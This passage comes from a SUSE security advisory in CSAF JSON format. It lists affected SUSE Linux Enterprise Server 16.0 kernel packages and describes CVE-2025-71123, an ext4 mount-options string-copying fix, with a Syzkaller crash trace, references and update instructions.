"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-71120"
},
{
"cve": "CVE-2025-71123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71123"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix string copying in parse_apply_sb_mount_options()\n\nstrscpy_pad() can\u0027t be used to copy a non-NUL-term string into a NUL-term\nstring of possibly bigger size. Commit 0efc5990bca5 (\"string.h: Introduce\nmemtostr() and memtostr_pad()\") provides additional information in that\nregard. So if this happens, the following warning is observed:\n\nstrnlen: detected buffer overflow: 65 byte read of buffer size 64\nWARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nModules linked in:\nCPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nCall Trace:\n \u003cTASK\u003e\n __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039\n strnlen include/linux/fortify-string.h:235 [inline]\n sized_strscpy include/linux/fortify-string.h:309 [inline]\n parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline]\n __ext4_fill_super fs/ext4/super.c:5261 [inline]\n ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706\n get_tree_bdev_flags+0x387/0x620 fs/super.c:1636\n vfs_get_tree+0x93/0x380 fs/super.c:1814\n do_new_mount fs/namespace.c:3553 [inline]\n path_mount+0x6ae/0x1f70 fs/namespace.c:3880\n do_mount fs/namespace.c:3893 [inline]\n __do_sys_mount fs/namespace.c:4103 [inline]\n __se_sys_mount fs/namespace.c:4080 [inline]\n __x64_sys_mount+0x280/0x300 fs/namespace.c:4080\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nSince userspace is expected to provide s_mount_opts field to be at most 63\ncharacters long with the ending byte being NUL-term, use a 64-byte buffer\nwhich matches the size of s_mount_opts, so that strscpy_pad() does its job\nproperly. Return with error if the user still managed to provide a\nnon-NUL-term string here.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71123",
"url": "https://www.suse.com/security/cve/CVE-2025-71123"
},
{
"category": "external",
"summary": "SUSE Bug 1256757 for CVE-2025-71123",
"url": "https://bugzilla.suse.com/1256757"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
